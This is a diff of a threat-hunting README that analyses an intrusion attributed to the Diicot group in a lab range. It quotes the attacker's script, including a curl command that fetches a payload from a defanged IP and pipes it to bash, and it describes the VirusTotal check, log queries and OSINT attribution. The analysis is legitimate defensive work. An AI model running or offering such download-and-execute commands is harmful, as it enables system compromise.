AaronRMartinez/Threat-Hunting-Diicot-Mexals-Threat-Group/README.md

 <u>Script Actions</u>

-● 'curl -s --connect-timeout 15 196[.]251[.]114[.]67/.x/black3': attempts to fetch a file named black3 from the IP address '196[.]251[.]114[.]67'
+● `curl -s --connect-timeout 15 196[.]251[.]114[.]67/.x/black3`: attempts to fetch a file named black3 from the IP address `196[.]251[.]114[.]67`
-● 'curl -s 196[.]251[.]114[.]67/.x/black3 | bash >/dev/null 2>&1': if the first curl attempt is successful, the script pipes the contents of the black3 file directly to bash, which will execute the commands in the file
+● `curl -s 196[.]251[.]114[.]67/.x/black3 | bash >/dev/null 2>&1`: if the first curl attempt is successful, the script pipes the contents of the black3 file directly to bash, which will execute the commands in the file
 ● If the first server is unreachable, it tries to fetch the payload from the second IP address and again pipes it to bash to execute

-A quick inspection of the IP address '196[.]251[.]114[.]67' with VirusTotal reveals that the IP address is classified as malicious as well.
-Another search of the 'DeviceNetworkEvents' table for successful connections with the new, malicious IP address returned no results.
+A quick inspection of the IP address `196[.]251[.]114[.]67` with VirusTotal reveals that the IP address is classified as malicious as well.
+Another search of the `DeviceNetworkEvents` table for successful connections with the new, malicious IP address returned no results.
 Suggesting that the threat actor was also unable to connect to the second IP address.
 At this stage of the investigation, sufficient artifacts and indicators had been collected and verified to conduct OSINT using available public information.
 Referencing the malicious files, IP addresses, and script code, a relevant threat report from **WIZ** was identified.
 The threat report focused on an active malware campaign being undergone by the threat group **Diicot** .
-The reported Diicot payload names, hashes, and indicators closely matched the activity observed within the CyberRange. revealing several new indicators for further threat hunting.
+The reported Diicot payload names, hashes, and indicators closely matched the activity observed within the CyberRange.
+Revealing several new indicators for further threat hunting.

 *The report: https://www.wiz.io/blog/diicot-threat-group-malware-campaign*

 In reference to the WIZ report, another indicator that suggests that the threat actor could possibly be the Diicot threat group, are several instances of Romanian words found in the scripts being utilized.
-A query utilizing the Romanian phrase 'în câmpul' was used to extract logs containing Romanian words.
+A query utilizing the Romanian phrase `în câmpul` was used to extract logs containing Romanian words.

 <u>Query</u>